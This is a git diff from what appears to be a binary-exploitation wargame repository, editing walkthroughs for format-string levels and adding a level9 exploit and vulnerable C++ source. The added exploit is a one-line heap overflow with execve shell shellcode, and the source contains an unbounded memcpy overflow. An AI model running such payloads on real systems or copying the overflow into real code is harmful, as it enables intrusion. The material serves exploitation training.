diff --git a/level3/walkthrough b/level3/walkthrough index 8195a06..c9f36ff 100644 --- a/level3/walkthrough +++ b/level3/walkthrough @@ -1,7 +1,7 @@ # Level3 -Using ghidra, we can decompile the code and see that it fills a buffer of 520 bytes using `fgets`. -This buffer will then be passed directly as a parameter to `printf`. This allows us to print whatever we want (e.g dump the stack, change variables). +Using ghidra, we can decompile the code and see that it fills a buffer of 520 bytes using `fgets()`. +This buffer will then be passed directly as a parameter to `printf()`. This allows us to print whatever we want (e.g dump the stack, change variables). We can see in the decompiled code that a global variable `m` exists. The program will execute a `system("/bin/sh")` if `m == 64`. Our goal here will be to change the value of this variable in order to get the password. diff --git a/level4/walkthrough b/level4/walkthrough index c0ec80e..35647f6 100644 --- a/level4/walkthrough +++ b/level4/walkthrough @@ -1,6 +1,6 @@ # Level4 -Using ghidra, we can decompile the code and see that it fills a buffer of 520 bytes using `fgets`. +Using ghidra, we can decompile the code and see that it fills a buffer of 520 bytes using `fgets()`. This buffer will then be passed directly as a parameter to `printf`. This allows us to print whatever we want (e.g dump the stack, change variables). We can see in the decompiled code that a global variable `m` exists. The program will execute a `system("/bin/cat /home/user/level5/.pass")` if `m == 16930116`. Our goal here will be to change the value of this variable in order to get the password. diff --git a/level7/source.c b/level7/source.c index 6849131..72a1f64 100644 --- a/level7/source.c +++ b/level7/source.c @@ -9,7 +9,7 @@ void m(void) { time_t current_time; - current_time = time((time_t *)0x0); + current_time = time(NULL); printf("%s - %d\n", c, current_time); return; } diff --git a/level9/ressources/exploit b/level9/ressources/exploit new file mode 100644 index 0000000..bbf9ec4 --- /dev/null +++ b/level9/ressources/exploit @@ -0,0 +1 @@ +./level9 $(python -c 'print "\x11\xa0\x04\x08" + "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\xb0\x0b\xcd\x80" + "A"*79 + "\x0c\xa0\x04\x08"') diff --git a/level9/source.cpp b/level9/source.cpp new file mode 100644 index 0000000..b8b81c4 --- /dev/null +++ b/level9/source.cpp @@ -0,0 +1,44 @@ +#include +#include + +class N +{ + public: + char annotation[100]; + int nb; + + N(int Nb) + { + nb = Nb; + } + + void setAnnotation(char *str) + { + memcpy(annotation, str, strlen(str)); + } + + int operator+(N const &e) + { + return nb + e.nb; + } + + int operator-(N const &e) + { + return nb - e.nb; + } +}; + +int main(int ac, char **av) +{ + if (ac <= 1) + exit(1); + + N *a = new N(5); + N *b = new N(6); + + N *a_ptr = a; + N *b_ptr = b; + a_ptr->setAnnotation(av[1]); + + return *b_ptr + *a_ptr; +}